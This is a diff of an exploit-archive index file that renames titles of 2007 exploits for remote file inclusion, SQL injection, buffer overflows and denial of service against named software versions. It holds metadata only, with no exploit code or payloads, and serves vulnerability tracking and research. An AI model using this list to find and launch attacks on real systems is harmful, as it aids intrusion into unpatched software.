-3212,platforms/php/webapps/3212.txt,"phpMyReports <= 3.0.11 (lib_head.php) Remote File Include",2007-01-27,GoLd_M,php,webapps,0 -3213,platforms/linux/local/3213.c,"Trend Micro VirusWall 3.81 (vscan/VSAPI) Local Buffer Overflow Exploit",2007-01-28,"Sebastian Wolfgarten",linux,local,0 +3212,platforms/php/webapps/3212.txt,"phpMyReports <= 3.0.11 - (lib_head.php) Remote File Include",2007-01-27,GoLd_M,php,webapps,0 +3213,platforms/linux/local/3213.c,"Trend Micro VirusWall 3.81 - (vscan/VSAPI) Local Buffer Overflow Exploit",2007-01-28,"Sebastian Wolfgarten",linux,local,0 3214,platforms/php/webapps/3214.pl,"EclipseBB 0.5.0 Lite (phpbb_root_path) Remote File Include Exploit",2007-01-28,"Mehmet Ince",php,webapps,0 -3215,platforms/php/webapps/3215.pl,"Foro Domus 2.10 (phpbb_root_path) Remote File Include Exploit",2007-01-28,"Mehmet Ince",php,webapps,0 -3216,platforms/php/webapps/3216.txt,"xNews 1.3 (xNews.php) Remote SQL Injection",2007-01-28,ajann,php,webapps,0 +3215,platforms/php/webapps/3215.pl,"Foro Domus 2.10 - (phpbb_root_path) Remote File Include Exploit",2007-01-28,"Mehmet Ince",php,webapps,0 +3216,platforms/php/webapps/3216.txt,"xNews 1.3 - (xNews.php) Remote SQL Injection",2007-01-28,ajann,php,webapps,0 3217,platforms/php/webapps/3217.txt,"PhP Generic library & framework - (include_path) RFI",2007-01-28,"Mehmet Ince",php,webapps,0 3218,platforms/windows/remote/3218.pl,"CA BrightStor ARCserve (msgeng.exe) - Remote Heap Overflow Exploit (2)",2007-01-28,"Jacopo Cervini",windows,remote,6503 3219,platforms/osx/local/3219.rb,"Mac OS X 10.4.8 (8L2127) - crashdump Privilege Escalation Exploit",2007-01-29,MoAB,osx,local,0 3220,platforms/windows/local/3220.c,"Multiple Printer Providers (spooler service) - Privilege Escalation Exploit",2007-01-29,"Andres Tarasco",windows,local,0 3221,platforms/php/webapps/3221.php,"GuppY <= 4.5.16 - Remote Commands Execution Exploit",2007-01-29,rgod,php,webapps,0 -3222,platforms/php/webapps/3222.txt,"Webfwlog <= 0.92 (debug.php) Remote File Disclosure",2007-01-29,GoLd_M,php,webapps,0 +3222,platforms/php/webapps/3222.txt,"Webfwlog <= 0.92 - (debug.php) Remote File Disclosure",2007-01-29,GoLd_M,php,webapps,0 3223,platforms/cgi/dos/3223.pl,"CVSTrac 2.0.0 - Post-Attack Database Resurrection DoS Exploit",2007-01-29,"Ralf S. Engelschall",cgi,dos,0 3224,platforms/windows/dos/3224.c,"Intel 2200BG 802.11 - disassociation packet Kernel Memory Corruption",2007-01-29,"Breno Silva Pinto",windows,dos,0 -3225,platforms/php/webapps/3225.pl,"Galeria Zdjec <= 3.0 (zd_numer.php) Local File Include Exploit",2007-01-30,ajann,php,webapps,0 -3226,platforms/php/webapps/3226.txt,"PHPFootball 1.6 (show.php) Remote Database Disclosure",2007-01-30,ajann,php,webapps,0 -3227,platforms/php/webapps/3227.txt,"CascadianFAQ <= 4.1 (index.php) Remote SQL Injection",2007-01-30,ajann,php,webapps,0 -3228,platforms/php/webapps/3228.txt,"MyNews <= 4.2.2 (themefunc.php) Remote File Include",2007-01-30,GoLd_M,php,webapps,0 +3225,platforms/php/webapps/3225.pl,"Galeria Zdjec <= 3.0 - (zd_numer.php) Local File Include Exploit",2007-01-30,ajann,php,webapps,0 +3226,platforms/php/webapps/3226.txt,"PHPFootball 1.6 - (show.php) Remote Database Disclosure",2007-01-30,ajann,php,webapps,0 +3227,platforms/php/webapps/3227.txt,"CascadianFAQ <= 4.1 - (index.php) Remote SQL Injection",2007-01-30,ajann,php,webapps,0 +3228,platforms/php/webapps/3228.txt,"MyNews <= 4.2.2 - (themefunc.php) Remote File Include",2007-01-30,GoLd_M,php,webapps,0 3229,platforms/windows/dos/3229.py,"Dev-C++ 4.9.9.2 CPP File Parsing Local Stack Overflow PoC",2007-01-30,shinnai,windows,dos,0 3230,platforms/osx/dos/3230.rb,"Apple iChat Bonjour 3.1.6.441 - Multiple Denial of Service Exploit",2007-01-30,MoAB,osx,dos,0 -3231,platforms/php/webapps/3231.txt,"phpBB2 MODificat <= 0.2.0 (functions.php) Remote Include",2007-01-30,"Mehmet Ince",php,webapps,0 +3231,platforms/php/webapps/3231.txt,"phpBB2 MODificat <= 0.2.0 - (functions.php) Remote Include",2007-01-30,"Mehmet Ince",php,webapps,0 3232,platforms/php/webapps/3232.txt,"Michelles L2J Dropcalc <= 4 - Remote SQL Injection",2007-01-31,Codebreak,php,webapps,0 3233,platforms/asp/webapps/3233.txt,"Fullaspsite Asp Hosting Sitesi (tr) SQL Injection",2007-01-31,cl24zy,asp,webapps,0 -3234,platforms/php/webapps/3234.txt,"ExoPHPDesk <= 1.2.1 (faq.php) Remote SQL Injection",2007-01-31,ajann,php,webapps,0 -3235,platforms/php/webapps/3235.txt,"Phpbb Tweaked <= 3 (phpbb_root_path) Remote Inclusion",2007-01-31,"Mehmet Ince",php,webapps,0 -3236,platforms/php/webapps/3236.txt,"Hailboards 1.2.0 (phpbb_root_path) Remote File Include",2007-01-31,"Mehmet Ince",php,webapps,0 +3234,platforms/php/webapps/3234.txt,"ExoPHPDesk <= 1.2.1 - (faq.php) Remote SQL Injection",2007-01-31,ajann,php,webapps,0 +3235,platforms/php/webapps/3235.txt,"Phpbb Tweaked <= 3 - (phpbb_root_path) Remote Inclusion",2007-01-31,"Mehmet Ince",php,webapps,0 +3236,platforms/php/webapps/3236.txt,"Hailboards 1.2.0 - (phpbb_root_path) Remote File Include",2007-01-31,"Mehmet Ince",php,webapps,0 3237,platforms/php/webapps/3237.txt,"Cadre PHP Framework Remote File Include",2007-01-31,y3dips,php,webapps,0 3238,platforms/php/webapps/3238.txt,"PHPMyRing <= 4.1.3b (fichier) Remote File Include",2007-01-31,ajann,php,webapps,0 -3239,platforms/php/webapps/3239.htm,"Extcalendar <= 2 (profile.php) Remote User Pass Change Exploit",2007-01-31,ajann,php,webapps,0 +3239,platforms/php/webapps/3239.htm,"Extcalendar <= 2 - (profile.php) Remote User Pass Change Exploit",2007-01-31,ajann,php,webapps,0 3240,platforms/php/webapps/3240.txt,"JV2 Folder Gallery <= 3.0 - Remote File Include",2007-01-31,"ThE dE@Th",php,webapps,0 3241,platforms/asp/webapps/3241.txt,"Hunkaray Duyuru Scripti (tr) Remote SQL Injection Exploit",2007-01-31,cl24zy,asp,webapps,0 3242,platforms/php/webapps/3242.txt,"Omegaboard <= 1.0beta4 - (functions.php) Remote File Include",2007-01-31,"Mehmet Ince",php,webapps,0 3243,platforms/php/webapps/3243.txt,"Cerulean Portal System 0.7b Remote File Include",2007-01-31,"Mehmet Ince",php,webapps,0 3244,platforms/windows/remote/3244.py,"CA BrightStor ARCserve - (lgserver.exe) Remote Stack Overflow Exploit",2007-02-01,"Winny Thomas",windows,remote,1900 -3245,platforms/php/webapps/3245.txt,"SIPS <= 0.3.1 (box.inc.php) Remote File Include",2007-02-01,ajann,php,webapps,0 -3246,platforms/php/webapps/3246.txt,"phpEventMan 1.0.2 (level) Remote File Include Vulnerabilities",2007-02-01,"Mehmet Ince",php,webapps,0 -3247,platforms/php/webapps/3247.txt,"Epistemon 1.0 (common.php inc_path) Remote File Include",2007-02-01,GoLd_M,php,webapps,0 -3248,platforms/windows/dos/3248.rb,"CA BrightStor ARCserve 11.5.2.0 (catirpc.dll) RPC Server DoS Exploit",2007-02-01,Shirkdog,windows,dos,0 -3249,platforms/php/webapps/3249.txt,"WebBuilder 2.0 (StageLoader.php) Remote File Include",2007-02-01,GoLd_M,php,webapps,0 -3250,platforms/php/webapps/3250.txt,"Portail Web Php <= 2.5.1 -(includes.php) Remote File Inclusion",2007-02-01,"laurent gaffié ",php,webapps,0 -3251,platforms/php/webapps/3251.txt,"CoD2: DreamStats <= 4.2 (index.php) Remote File Include",2007-02-02,"ThE dE@Th",php,webapps,0 -3252,platforms/php/webapps/3252.txt,"EQdkp <= 1.3.1 (Referer Spoof) Remote Database Backup",2007-02-02,Eight10,php,webapps,0 -3253,platforms/php/webapps/3253.txt,"Flipper Poll 1.1.0 (poll.php root_path) Remote File Include",2007-02-02,"Mehmet Ince",php,webapps,0 +3245,platforms/php/webapps/3245.txt,"SIPS <= 0.3.1 - (box.inc.php) Remote File Include",2007-02-01,ajann,php,webapps,0 +3246,platforms/php/webapps/3246.txt,"phpEventMan 1.0.2 - (level) Remote File Include Vulnerabilities",2007-02-01,"Mehmet Ince",php,webapps,0 +3247,platforms/php/webapps/3247.txt,"Epistemon 1.0 - (common.php inc_path) Remote File Include",2007-02-01,GoLd_M,php,webapps,0 +3248,platforms/windows/dos/3248.rb,"CA BrightStor ARCserve 11.5.2.0 - (catirpc.dll) RPC Server DoS Exploit",2007-02-01,Shirkdog,windows,dos,0 +3249,platforms/php/webapps/3249.txt,"WebBuilder 2.0 - (StageLoader.php) Remote File Include",2007-02-01,GoLd_M,php,webapps,0 +3250,platforms/php/webapps/3250.txt,"Portail Web Php <= 2.5.1 - (includes.php) Remote File Inclusion",2007-02-01,"laurent gaffié ",php,webapps,0 +3251,platforms/php/webapps/3251.txt,"CoD2: DreamStats <= 4.2 - (index.php) Remote File Include",2007-02-02,"ThE dE@Th",php,webapps,0 +3252,platforms/php/webapps/3252.txt,"EQdkp <= 1.3.1 - (Referer Spoof) Remote Database Backup",2007-02-02,Eight10,php,webapps,0 +3253,platforms/php/webapps/3253.txt,"Flipper Poll 1.1.0 - (poll.php root_path) Remote File Include",2007-02-02,"Mehmet Ince",php,webapps,0 3254,platforms/windows/dos/3254.py,"Remotesoft .NET Explorer 2.0.1 - Local Stack Overflow PoC",2007-02-02,shinnai,windows,dos,0 3255,platforms/php/webapps/3255.php,"F3Site <= 2.1 - Remote Code Execution Exploit",2007-02-02,Kacper,php,webapps,0 -3256,platforms/php/webapps/3256.txt,"dB Masters Curium CMS <= 1.03 (c_id) Remote SQL Injection",2007-02-02,ajann,php,webapps,0 -3257,platforms/osx/dos/3257.php,"Chicken of the VNC 2.0 (NULL-pointer) Remote Denial of Service Exploit",2007-02-02,poplix,osx,dos,0 -3258,platforms/php/webapps/3258.txt,"phpBB ezBoard converter 0.2 (ezconvert_dir) Remote File Include Exploit",2007-02-02,"Mehmet Ince",php,webapps,0 -3259,platforms/php/webapps/3259.pl,"phpBB++ Build 100 (phpbb_root_path) Remote File Include Exploit",2007-02-02,"Mehmet Ince",php,webapps,0 +3256,platforms/php/webapps/3256.txt,"dB Masters Curium CMS <= 1.03 - (c_id) Remote SQL Injection",2007-02-02,ajann,php,webapps,0 +3257,platforms/osx/dos/3257.php,"Chicken of the VNC 2.0 - (NULL-pointer) Remote Denial of Service Exploit",2007-02-02,poplix,osx,dos,0 +3258,platforms/php/webapps/3258.txt,"phpBB ezBoard converter 0.2 - (ezconvert_dir) Remote File Include Exploit",2007-02-02,"Mehmet Ince",php,webapps,0 +3259,platforms/php/webapps/3259.pl,"phpBB++ Build 100 - (phpbb_root_path) Remote File Include Exploit",2007-02-02,"Mehmet Ince",php,webapps,0 3260,platforms/windows/local/3260.txt,"Microsoft Word 2000 Unspecified Code Execution Exploit (0Day)",2007-02-03,xCuter,windows,local,0 -3261,platforms/php/webapps/3261.txt,"Photo Galerie Standard <= 1.1 (view.php) SQL Injection",2007-02-03,ajann,php,webapps,0 +3261,platforms/php/webapps/3261.txt,"Photo Galerie Standard <= 1.1 - (view.php) SQL Injection",2007-02-03,ajann,php,webapps,0 3262,platforms/php/webapps/3262.php,"Woltlab Burning Board Lite <= 1.0.2pl3e (pms.php) SQL Injection Exploit",2007-02-03,rgod,php,webapps,0 -3263,platforms/php/webapps/3263.txt,"KDPics <= 1.11 (exif.php lib_path) Remote File Include",2007-02-03,AsTrex,php,webapps,0 -3264,platforms/windows/remote/3264.pl,"Imail 8.10-8.12 (RCPT TO) Remote Buffer Overflow Exploit",2007-02-04,"Jacopo Cervini",windows,remote,25 -3265,platforms/windows/remote/3265.pm,"Imail 8.10-8.12 (RCPT TO) Remote Buffer Overflow Exploit (Metasploit)",2007-02-04,"Jacopo Cervini",windows,remote,25 +3263,platforms/php/webapps/3263.txt,"KDPics <= 1.11 - (exif.php lib_path) Remote File Include",2007-02-03,AsTrex,php,webapps,0 +3264,platforms/windows/remote/3264.pl,"Imail 8.10-8.12 - (RCPT TO) Remote Buffer Overflow Exploit",2007-02-04,"Jacopo Cervini",windows,remote,25 +3265,platforms/windows/remote/3265.pm,"Imail 8.10-8.12 - (RCPT TO) Remote Buffer Overflow Exploit (Metasploit)",2007-02-04,"Jacopo Cervini",windows,remote,25 3266,platforms/php/webapps/3266.txt,"Flip 2.01 final - (previewtheme.php inc_path) RFI",2007-02-04,GoLd_M,php,webapps,0 -3267,platforms/php/webapps/3267.txt,"Geeklog 2 (BaseView.php) Remote File Inclusion",2007-02-05,GoLd_M,php,webapps,0 -3268,platforms/php/webapps/3268.txt,"SMA-DB <= 0.3.9 (settings.php) Remote File Inclusion",2007-02-05,"ThE dE@Th",php,webapps,0 +3267,platforms/php/webapps/3267.txt,"Geeklog 2 - (BaseView.php) Remote File Inclusion",2007-02-05,GoLd_M,php,webapps,0 +3268,platforms/php/webapps/3268.txt,"SMA-DB <= 0.3.9 - (settings.php) Remote File Inclusion",2007-02-05,"ThE dE@Th",php,webapps,0 3269,platforms/multiple/remote/3269.pl,"Oracle 9i/10g DBMS_EXPORT_EXTENSION SQL Injection Exploit",2007-02-05,bunker,multiple,remote,0 3270,platforms/php/webapps/3270.pl,"Categories hierarchy phpBB Mod 2.1.2 - (phpbb_root_path) RFI Exploit",2007-02-05,"Mehmet Ince",php,webapps,0 3271,platforms/php/webapps/3271.php,"GGCMS <= 1.1.0 RC1 - Remote Code Execution Exploit",2007-02-05,Kacper,php,webapps,0 -3272,platforms/windows/dos/3272.html,"Microsoft Internet Explorer 6 (mshtml.dll) Null Pointer Dereference Exploit",2007-02-05,AmesianX,windows,dos,0 +3272,platforms/windows/dos/3272.html,"Microsoft Internet Explorer 6 - (mshtml.dll) Null Pointer Dereference Exploit",2007-02-05,AmesianX,windows,dos,0 3273,platforms/tru64/local/3273.ksh,"HP Tru64 Alpha OSF1 5.1 - (ps) Information Leak Exploit",2007-02-06,bunker,tru64,local,0 3274,platforms/windows/remote/3274.txt,"MySQL 4.x/5.0 - User-Defined Function (UDF) Command Execution Exploit (Windows)",2007-02-06,"Marco Ivaldi",windows,remote,3306 -3275,platforms/php/webapps/3275.txt,"LightRO CMS 1.0 (inhalt.php) Remote File Include",2007-02-06,ajann,php,webapps,0 +3275,platforms/php/webapps/3275.txt,"LightRO CMS 1.0 - (inhalt.php) Remote File Include",2007-02-06,ajann,php,webapps,0 3276,platforms/windows/dos/3276.cpp,"FlashFXP 3.4.0 build 1145 - Remote Buffer Overflow DoS Exploit",2007-02-06,Marsu,windows,dos,0 3277,platforms/windows/dos/3277.cpp,"SmartFTP Client 2.0.1002 - Remote Heap Overflow DoS Exploit",2007-02-06,Marsu,windows,dos,0 -3278,platforms/php/webapps/3278.txt,"Kisisel Site 2007 (tr) Remote SQL Injection",2007-02-06,cl24zy,php,webapps,0 +3278,platforms/php/webapps/3278.txt,"Kisisel Site 2007 - (tr) Remote SQL Injection",2007-02-06,cl24zy,php,webapps,0 3279,platforms/windows/remote/3279.html,"Alibaba Alipay (Remove ActiveX) Remote Code Execution Exploit",2007-02-06,cocoruder,windows,remote,0 -3280,platforms/php/webapps/3280.txt,"AgerMenu 0.01 (top.inc.php rootdir) Remote File Include",2007-02-07,GoLd_M,php,webapps,0 -3281,platforms/php/webapps/3281.txt,"WebMatic 2.6 (index_album.php) Remote File Include",2007-02-07,MadNet,php,webapps,0 +3280,platforms/php/webapps/3280.txt,"AgerMenu 0.01 - (top.inc.php rootdir) Remote File Include",2007-02-07,GoLd_M,php,webapps,0 +3281,platforms/php/webapps/3281.txt,"WebMatic 2.6 - (index_album.php) Remote File Include",2007-02-07,MadNet,php,webapps,0 3282,platforms/php/webapps/3282.pl,"Advanced Poll <= 2.0.5-dev Remote Admin Session Generator Exploit",2007-02-07,diwou,php,webapps,0 3283,platforms/php/webapps/3283.txt,"otscms <= 2.1.5 - (SQL/XSS) Multiple Vulnerabilities",2007-02-07,GregStar,php,webapps,0 -3284,platforms/php/webapps/3284.txt,"Maian Recipe 1.0 (path_to_folder) Remote File Include",2007-02-07,Denven,php,webapps,0 +3284,platforms/php/webapps/3284.txt,"Maian Recipe 1.0 - (path_to_folder) Remote File Include",2007-02-07,Denven,php,webapps,0 3285,platforms/php/webapps/3285.htm,"Site-Assistant <= 0990 - (paths[version]) Remote File Include Exploit",2007-02-08,ajann,php,webapps,0 -3286,platforms/php/webapps/3286.asp,"LightRO CMS 1.0 (index.php projectid) Remote SQL Injection Exploit",2007-02-08,ajann,php,webapps,0 -3287,platforms/php/webapps/3287.asp,"LushiNews <= 1.01 (comments.php) Remote SQL Injection Exploit",2007-02-08,ajann,php,webapps,0 -3288,platforms/php/webapps/3288.asp,"LushiWarPlaner 1.0 (register.php) Remote SQL Injection Exploit",2007-02-08,ajann,php,webapps,0 +3286,platforms/php/webapps/3286.asp,"LightRO CMS 1.0 - (index.php projectid) Remote SQL Injection Exploit",2007-02-08,ajann,php,webapps,0 +3287,platforms/php/webapps/3287.asp,"LushiNews <= 1.01 - (comments.php) Remote SQL Injection Exploit",2007-02-08,ajann,php,webapps,0 +3288,platforms/php/webapps/3288.asp,"LushiWarPlaner 1.0 - (register.php) Remote SQL Injection Exploit",2007-02-08,ajann,php,webapps,0 3289,platforms/linux/dos/3289.c,"Axigen <= 2.0.0b1 - Remote Denial of Service Exploit",2007-02-08,mu-b,linux,dos,0 3290,platforms/linux/dos/3290.c,"Axigen <= 2.0.0b1 - Remote Denial of Service Exploit (2)",2007-02-08,mu-b,linux,dos,0 3291,platforms/windows/remote/3291.pl,"SAP Web Application Server 6.40 - Arbitrary File Disclosure Exploit",2007-02-08,Nicob,windows,remote,0 3292,platforms/php/webapps/3292.txt,"OPENi-CMS Site Protection Plugin Remote File Inclusion",2007-02-11,y3dips,php,webapps,0 3293,platforms/solaris/remote/3293.sh,"SunOS 5.10/5.11 in.telnetd Remote Authentication Bypass Exploit",2007-02-11,kingcope,solaris,remote,23 3294,platforms/hardware/remote/3294.txt,"IP3 NetAccess < 4.1.9.6 - Remote Arbitrary File Disclosure",2007-02-11,"Sebastian Wolfgarten",hardware,remote,80 -3295,platforms/asp/webapps/3295.txt,"Philboard <= 1.14 (philboard_forum.asp) SQL Injection",2007-02-12,"Mehmet Ince",asp,webapps,0 +3295,platforms/asp/webapps/3295.txt,"Philboard <= 1.14 - (philboard_forum.asp) SQL Injection",2007-02-12,"Mehmet Ince",asp,webapps,0 3296,platforms/windows/remote/3296.c,"uTorrent 1.6 build 474 - (announce) Key Remote Heap Overflow Exploit",2007-02-12,defsec,windows,remote,0 3297,platforms/php/webapps/3297.htm,"AT Contenator <= 1.0 - (Root_To_Script) Remote File Include Exploit",2007-02-13,ajann,php,webapps,0 -3298,platforms/php/webapps/3298.pl,"Xaran CMS <= 2.0 (xarancms_haupt.php) SQL Injection Exploit",2007-02-13,ajann,php,webapps,0 +3298,platforms/php/webapps/3298.pl,"Xaran CMS <= 2.0 - (xarancms_haupt.php) SQL Injection Exploit",2007-02-13,ajann,php,webapps,0 3299,platforms/php/webapps/3299.pl,"phpCC <= 4.2 beta (nickpage.php npid) Remote SQL Injection Exploit",2007-02-13,ajann,php,webapps,0 3300,platforms/php/webapps/3300.pl,"Advanced Poll <= 2.0.5-dev Remote Code Execution Exploit",2007-02-13,diwou,php,webapps,0 -3301,platforms/asp/webapps/3301.txt,"PollMentor 2.0 (pollmentorres.asp id) SQL Injection",2007-02-13,SaO,asp,webapps,0 +3301,platforms/asp/webapps/3301.txt,"PollMentor 2.0 - (pollmentorres.asp id) SQL Injection",2007-02-13,SaO,asp,webapps,0 3302,platforms/windows/remote/3302.sh,"Lotus Domino <= R6 Webmail Remote Password Hash Dumper Exploit",2007-02-13,"Marco Ivaldi",windows,remote,80 3303,platforms/multiple/remote/3303.sh,"Portable OpenSSH <= 3.6.1p-PAM / 4.1-SUSE - Timing Attack Exploit",2007-02-13,"Marco Ivaldi",multiple,remote,0 3304,platforms/windows/dos/3304.py,"MiniWebsvr <= 0.0.6 - Remote Resource Consumption DoS Exploit",2007-02-13,shinnai,windows,dos,0 @@ -2977,70 +2977,70 @@ id,file,description,date,author,platform,type,port 3306,platforms/windows/dos/3306.pl,"MailEnable Professional/Enterprise <= 2.35 Out of Bounds DoS Exploit",2007-02-14,mu-b,windows,dos,0 3307,platforms/windows/dos/3307.html,"ActSoft DVD-Tools - (dvdtools.ocx) Remote Buffer Overflow Exploit PoC",2007-02-14,shinnai,windows,dos,0 3308,platforms/windows/dos/3308.pl,"MailEnable Professional/Enterprise <= 2.37 - Denial of Service Exploit",2007-02-14,mu-b,windows,dos,0 -3309,platforms/php/webapps/3309.txt,"Jupiter CMS 1.1.5 (index.php) Local/Remote File Include",2007-02-14,DarkFig,php,webapps,0 -3310,platforms/php/webapps/3310.php,"Jupiter CMS 1.1.5 (Client-IP) Remote SQL Injection Exploit",2007-02-14,DarkFig,php,webapps,0 +3309,platforms/php/webapps/3309.txt,"Jupiter CMS 1.1.5 - (index.php) Local/Remote File Include",2007-02-14,DarkFig,php,webapps,0 +3310,platforms/php/webapps/3310.php,"Jupiter CMS 1.1.5 - (Client-IP) Remote SQL Injection Exploit",2007-02-14,DarkFig,php,webapps,0 3311,platforms/php/webapps/3311.php,"Jupiter CMS 1.1.5 - Remote File Upload Exploit",2007-02-14,DarkFig,php,webapps,0 3312,platforms/php/webapps/3312.pl,"Drupal < 5.1 - (post comments) Remote Command Execution Exploit (2)",2007-02-15,str0ke,php,webapps,0 3313,platforms/php/webapps/3313.pl,"Drupal < 4.7.6 - (post comments) Remote Command Execution Exploit (2)",2007-02-15,str0ke,php,webapps,0 -3314,platforms/php/webapps/3314.txt,"ZebraFeeds 1.0 (zf_path) Remote File Include Vulnerabilities",2007-02-15,"ThE dE@Th",php,webapps,0 -3315,platforms/php/webapps/3315.txt,"nabopoll 1.2 (survey.inc.php path) Remote File Include",2007-02-15,Cr@zy_King,php,webapps,0 -3317,platforms/asp/webapps/3317.txt,"CodeAvalanche News 1.x (CAT_ID) Remote SQL Injection",2007-02-15,beks,asp,webapps,0 +3314,platforms/php/webapps/3314.txt,"ZebraFeeds 1.0 - (zf_path) Remote File Include Vulnerabilities",2007-02-15,"ThE dE@Th",php,webapps,0 +3315,platforms/php/webapps/3315.txt,"nabopoll 1.2 - (survey.inc.php path) Remote File Include",2007-02-15,Cr@zy_King,php,webapps,0 +3317,platforms/asp/webapps/3317.txt,"CodeAvalanche News 1.x - (CAT_ID) Remote SQL Injection",2007-02-15,beks,asp,webapps,0 3318,platforms/asp/webapps/3318.txt,"Aktueldownload Haber scripti (id) Remote SQL Injection",2007-02-15,"Mehmet Ince",asp,webapps,0 3319,platforms/windows/remote/3319.pl,"MailEnable Enterprise <= 2.32 < 2.34 - Remote Buffer Overflow Exploit",2007-02-16,mu-b,windows,remote,143 3320,platforms/windows/remote/3320.pl,"MailEnable Professional 2.35 - Remote Buffer Overflow Exploit",2007-02-16,mu-b,windows,remote,143 3321,platforms/asp/webapps/3321.txt,"Snitz Forums 2000 3.1 SR4 - (pop_profile.asp) SQL Injection",2007-02-16,"Mehmet Ince",asp,webapps,0 -3322,platforms/php/webapps/3322.htm,"VS-News-System <= 1.2.1 (newsordner) Remote File Include Exploit",2007-02-16,ajann,php,webapps,0 -3323,platforms/php/webapps/3323.htm,"VS-Link-Partner <= 2.1 (script_pfad) Remote File Include Exploit",2007-02-16,ajann,php,webapps,0 +3322,platforms/php/webapps/3322.htm,"VS-News-System <= 1.2.1 - (newsordner) Remote File Include Exploit",2007-02-16,ajann,php,webapps,0 +3323,platforms/php/webapps/3323.htm,"VS-Link-Partner <= 2.1 - (script_pfad) Remote File Include Exploit",2007-02-16,ajann,php,webapps,0 3324,platforms/php/webapps/3324.txt,"Htaccess Passwort Generator 1.1 - (ht_pfad) RFI",2007-02-16,kezzap66345,php,webapps,0 -3325,platforms/php/webapps/3325.pl,"webSPELL 4.01.02 (showonly) Remote Blind SQL Injection Exploit",2007-02-16,DNX,php,webapps,0 -3326,platforms/php/webapps/3326.txt,"Vivvo Article Manager 3.4 (root) Local File Inclusion",2007-02-16,Snip0r,php,webapps,0 -3327,platforms/php/webapps/3327.txt,"XLAtunes 0.1 (album) Remote SQL Injection",2007-02-17,Bl0od3r,php,webapps,0 -3328,platforms/php/webapps/3328.htm,"S-Gastebuch <= 1.5.3 (gb_pfad) Remote File Include Exploit",2007-02-18,ajann,php,webapps,0 -3329,platforms/linux/remote/3329.c,"Axigen eMail Server 2.0.0b2 (pop3) Remote Format String Exploit",2007-02-18,fuGich,linux,remote,110 +3325,platforms/php/webapps/3325.pl,"webSPELL 4.01.02 - (showonly) Remote Blind SQL Injection Exploit",2007-02-16,DNX,php,webapps,0 +3326,platforms/php/webapps/3326.txt,"Vivvo Article Manager 3.4 - (root) Local File Inclusion",2007-02-16,Snip0r,php,webapps,0 +3327,platforms/php/webapps/3327.txt,"XLAtunes 0.1 - (album) Remote SQL Injection",2007-02-17,Bl0od3r,php,webapps,0 +3328,platforms/php/webapps/3328.htm,"S-Gastebuch <= 1.5.3 - (gb_pfad) Remote File Include Exploit",2007-02-18,ajann,php,webapps,0 +3329,platforms/linux/remote/3329.c,"Axigen eMail Server 2.0.0b2 - (pop3) Remote Format String Exploit",2007-02-18,fuGich,linux,remote,110 3330,platforms/linux/local/3330.pl,"ProFTPD 1.3.0/1.3.0a - (mod_ctrls support) Local Buffer Overflow Exploit (1)",2007-02-18,Revenge,linux,local,0 -3331,platforms/windows/dos/3331.c,"VicFTPS < 5.0 (CWD) Remote Buffer Overflow Exploit PoC",2007-02-18,r0ut3r,windows,dos,0 -3332,platforms/php/webapps/3332.pl,"Xpression News 1.0.1 (archives.php) Remote File Disclosure Exploit",2007-02-18,r0ut3r,php,webapps,0 +3331,platforms/windows/dos/3331.c,"VicFTPS < 5.0 - (CWD) Remote Buffer Overflow Exploit PoC",2007-02-18,r0ut3r,windows,dos,0 +3332,platforms/php/webapps/3332.pl,"Xpression News 1.0.1 - (archives.php) Remote File Disclosure Exploit",2007-02-18,r0ut3r,php,webapps,0 3333,platforms/linux/local/3333.pl,"ProFTPD 1.3.0/1.3.0a - (mod_ctrls support) Local Buffer Overflow Exploit (2)",2007-02-19,Revenge,linux,local,0 3334,platforms/php/webapps/3334.asp,"PHP-Nuke Module Emporium <= 2.3.0 - Remote SQL Injection Exploit",2007-02-19,ajann,php,webapps,0 -3335,platforms/windows/remote/3335.pm,"IPSwitch WS-FTP 5.05 (XMD5) Remote Buffer Overflow Exploit (Metasploit)",2007-02-19,"Jacopo Cervini",windows,remote,21 -3336,platforms/php/webapps/3336.txt,"Ultimate Fun Book 1.02 (function.php) Remote File Include",2007-02-20,kezzap66345,php,webapps,0 -3337,platforms/php/webapps/3337.php,"NukeSentinel 2.5.05 (nsbypass.php) Blind SQL Injection Exploit",2007-02-20,DarkFig,php,webapps,0 +3335,platforms/windows/remote/3335.pm,"IPSwitch WS-FTP 5.05 - (XMD5) Remote Buffer Overflow Exploit (Metasploit)",2007-02-19,"Jacopo Cervini",windows,remote,21 +3336,platforms/php/webapps/3336.txt,"Ultimate Fun Book 1.02 - (function.php) Remote File Include",2007-02-20,kezzap66345,php,webapps,0 +3337,platforms/php/webapps/3337.php,"NukeSentinel 2.5.05 - (nsbypass.php) Blind SQL Injection Exploit",2007-02-20,DarkFig,php,webapps,0 3338,platforms/php/webapps/3338.php,"NukeSentinel 2.5.05 - (nukesentinel.php) File Disclosure Exploit",2007-02-20,DarkFig,php,webapps,0 -3339,platforms/asp/webapps/3339.txt,"Online Web Building 2.0 (id) Remote SQL Injection",2007-02-20,"Mehmet Ince",asp,webapps,0 -3340,platforms/windows/remote/3340.html,"Mozilla Firefox <= 2.0.0.1 (location.hostname) Cross-Domain",2007-02-20,"Michal Zalewski",windows,remote,0 -3341,platforms/windows/dos/3341.cpp,"TurboFTP 5.30 Build 572 (newline/LIST) Multiple Remote DoS Exploit",2007-02-20,Marsu,windows,dos,0 +3339,platforms/asp/webapps/3339.txt,"Online Web Building 2.0 - (id) Remote SQL Injection",2007-02-20,"Mehmet Ince",asp,webapps,0 +3340,platforms/windows/remote/3340.html,"Mozilla Firefox <= 2.0.0.1 - (location.hostname) Cross-Domain",2007-02-20,"Michal Zalewski",windows,remote,0 +3341,platforms/windows/dos/3341.cpp,"TurboFTP 5.30 Build 572 - (newline/LIST) Multiple Remote DoS Exploit",2007-02-20,Marsu,windows,dos,0 3342,platforms/windows/local/3342.c,"News Rover 12.1 Rev 1 - Remote Stack Overflow Exploit",2007-02-20,Marsu,windows,local,0 -3343,platforms/windows/dos/3343.cpp,"FTP Voyager <= 14.0.0.3 (CWD) Remote Stack Overflow Exploit PoC",2007-02-20,Marsu,windows,dos,0 +3343,platforms/windows/dos/3343.cpp,"FTP Voyager <= 14.0.0.3 - (CWD) Remote Stack Overflow Exploit PoC",2007-02-20,Marsu,windows,dos,0 3344,platforms/php/webapps/3344.pl,"PHP-Nuke <= 8.0 Final (INSERT) Blind SQL Injection Exploit (mysql)",2007-02-20,krasza,php,webapps,0 3345,platforms/php/webapps/3345.pl,"PHP-Nuke <= 8.0 Final (INSERT) Remote SQL Injection Exploit",2007-02-20,krasza,php,webapps,0 3346,platforms/php/webapps/3346.pl,"PHP-Nuke <= 8.0 Final (HTTP Referers) Remote SQL Injection Exploit",2007-02-20,krasza,php,webapps,0 